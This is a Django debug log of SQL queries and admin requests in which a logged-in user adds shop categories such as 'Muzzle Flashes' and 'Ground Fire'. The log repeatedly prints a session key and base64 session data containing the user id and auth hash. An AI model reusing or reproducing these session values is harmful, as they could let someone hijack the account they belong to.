12:59:48,057 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T12:59:48.044089+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 12, 59, 48, 44089, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 12:59:48,061 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 12:59:48,065 utils 11259 139831317362432 (0.001) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-13 12:59:48,066 utils 11259 139831317362432 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-13 12:59:48,073 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC, "shop_category"."id" DESC; args=() DEBUG 2019-12-13 12:59:48,261 utils 11259 139831317362432 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T12:59:48.258087+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 12, 59, 48, 258087, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 12:59:48] "GET /shop/category/ HTTP/1.0" 200 7816 DEBUG 2019-12-13 13:04:35,909 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:04:35.898998+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 4, 35, 898998, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:04:35,912 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:04:35,958 utils 11259 139831317362432 (0.002) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:04:36,004 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:04:36.001904+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 4, 36, 1904, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:04:36] "GET /shop/category/add/ HTTP/1.0" 200 7672 DEBUG 2019-12-13 13:04:36,350 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:04:36.335982+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 4, 36, 335982, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:04:36,354 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:04:36] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:05:02,713 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:05:02.704358+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 5, 2, 704358, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:05:02,717 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:05:02,727 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 11; args=(11,) DEBUG 2019-12-13 13:05:02,733 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 11 LIMIT 1; args=(11,) DEBUG 2019-12-13 13:05:02,735 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 11 AND "shop_category"."slug" = 'muzzle-flashes') LIMIT 1; args=(11, 'muzzle-flashes') DEBUG 2019-12-13 13:05:02,737 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Muzzle Flashes' LIMIT 1; args=('Muzzle Flashes',) DEBUG 2019-12-13 13:05:02,739 utils 11259 139831317362432 (0.001) SELECT "shop_category"."lft", "shop_category"."rght", "shop_category"."level", "shop_category"."tree_id" FROM "shop_category" WHERE "shop_category"."id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC LIMIT 1; args=(11,) DEBUG 2019-12-13 13:05:02,741 utils 11259 139831317362432 (0.001) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 1 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 1 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 9 AND ("lft" > 1 OR "rght" > 1); args=[1, 2, 1, 2, 9, 1, 1] DEBUG 2019-12-13 13:05:02,745 utils 11259 139831317362432 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Muzzle Flashes', 11, 'categories/2019/12/13/weapons1.png', 'Muzzle Flashes', false, 'muzzle-flashes', 2, 3, 9, 1) RETURNING "shop_category"."id"; args=('Muzzle Flashes', 11, 'categories/2019/12/13/weapons1.png', 'Muzzle Flashes', False, 'muzzle-flashes', 2, 3, 9, 1) DEBUG 2019-12-13 13:05:02,747 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T13:05:02.745836+00:00'::timestamptz, 6, 8, '16', 'Muzzle Flashes', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 13, 5, 2, 745836, tzinfo=), 6, 8, '16', 'Muzzle Flashes', 1, '[{"added": {}}]') [13/Dec/2019 13:05:02] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 13:05:03,051 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:05:03.039259+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 5, 3, 39259, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:05:03,055 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:05:03,127 utils 11259 139831317362432 (0.003) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:05:03,167 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:05:03.165111+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 5, 3, 165111, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:05:03] "GET /shop/category/add/ HTTP/1.0" 200 7943 [13/Dec/2019 13:05:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 13:05:03,518 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:05:03.504140+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 5, 3, 504140, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:05:03,523 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:05:03] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:05:31,717 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:05:31.706668+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 5, 31, 706668, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:05:31,719 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:05:31,725 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 11; args=(11,) DEBUG 2019-12-13 13:05:31,729 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 11 LIMIT 1; args=(11,) DEBUG 2019-12-13 13:05:31,731 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 11 AND "shop_category"."slug" = 'bullet-impact-hits') LIMIT 1; args=(11, 'bullet-impact-hits') DEBUG 2019-12-13 13:05:31,732 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Bullet Impact Hits' LIMIT 1; args=('Bullet Impact Hits',) DEBUG 2019-12-13 13:05:31,735 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'Bullet Impact Hits' AND "shop_category"."parent_id" = 11) ORDER BY "shop_category"."name" ASC, "shop_category"."lft" ASC LIMIT 1; args=('Bullet Impact Hits', 11) DEBUG 2019-12-13 13:05:31,737 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 11; args=(11,) DEBUG 2019-12-13 13:05:31,738 utils 11259 139831317362432 (0.001) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 1 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 1 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 9 AND ("lft" > 1 OR "rght" > 1); args=[1, 2, 1, 2, 9, 1, 1] DEBUG 2019-12-13 13:05:31,741 utils 11259 139831317362432 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Bullet Impact Hits', 11, 'categories/2019/12/13/weapons2.png', 'Bullet Impact Hits', false, 'bullet-impact-hits', 2, 3, 9, 1) RETURNING "shop_category"."id"; args=('Bullet Impact Hits', 11, 'categories/2019/12/13/weapons2.png', 'Bullet Impact Hits', False, 'bullet-impact-hits', 2, 3, 9, 1) DEBUG 2019-12-13 13:05:31,743 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T13:05:31.742024+00:00'::timestamptz, 6, 8, '17', 'Bullet Impact Hits', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 13, 5, 31, 742024, tzinfo=), 6, 8, '17', 'Bullet Impact Hits', 1, '[{"added": {}}]') [13/Dec/2019 13:05:31] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 13:05:32,044 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:05:32.032945+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 5, 32, 32945, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:05:32,047 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:05:32,106 utils 11259 139831317362432 (0.002) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:05:32,160 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:05:32.157559+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 5, 32, 157559, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:05:32] "GET /shop/category/add/ HTTP/1.0" 200 8001 DEBUG 2019-12-13 13:05:32,504 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:05:32.492070+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 5, 32, 492070, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:05:32,507 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:05:32] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:05:54,210 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:05:54.201074+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 5, 54, 201074, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:05:54,213 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:05:54,224 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 1; args=(1,) DEBUG 2019-12-13 13:05:54,228 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 1 LIMIT 1; args=(1,) DEBUG 2019-12-13 13:05:54,231 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 1 AND "shop_category"."slug" = 'ground-fire') LIMIT 1; args=(1, 'ground-fire') DEBUG 2019-12-13 13:05:54,233 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Ground Fire' LIMIT 1; args=('Ground Fire',) DEBUG 2019-12-13 13:05:54,237 utils 11259 139831317362432 (0.001) SELECT "shop_category"."lft", "shop_category"."rght", "shop_category"."level", "shop_category"."tree_id" FROM "shop_category" WHERE "shop_category"."id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC LIMIT 1; args=(1,) DEBUG 2019-12-13 13:05:54,238 utils 11259 139831317362432 (0.001) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 1 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 1 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 3 AND ("lft" > 1 OR "rght" > 1); args=[1, 2, 1, 2, 3, 1, 1] DEBUG 2019-12-13 13:05:54,242 utils 11259 139831317362432 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Ground Fire', 1, 'categories/2019/12/13/popular3.png', 'Ground Fire', false, 'ground-fire', 2, 3, 3, 1) RETURNING "shop_category"."id"; args=('Ground Fire', 1, 'categories/2019/12/13/popular3.png', 'Ground Fire', False, 'ground-fire', 2, 3, 3, 1) DEBUG 2019-12-13 13:05:54,244 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T13:05:54.243458+00:00'::timestamptz, 6, 8, '18', 'Ground Fire', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 13, 5, 54, 243458, tzinfo=), 6, 8, '18', 'Ground Fire', 1, '[{"added": {}}]') [13/Dec/2019 13:05:54] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 13:05:54,551 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:05:54.538791+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 5, 54, 538791, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:05:54,555 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:05:54,632 utils 11259 139831317362432 (0.003) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:05:54,681 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:05:54.679333+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 5, 54, 679333, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:05:54] "GET /shop/category/add/ HTTP/1.0" 200 8041 DEBUG 2019-12-13 13:05:55,017 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:05:55.008555+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 5, 55, 8555, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:05:55,021 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:05:55] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:06:17,797 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" 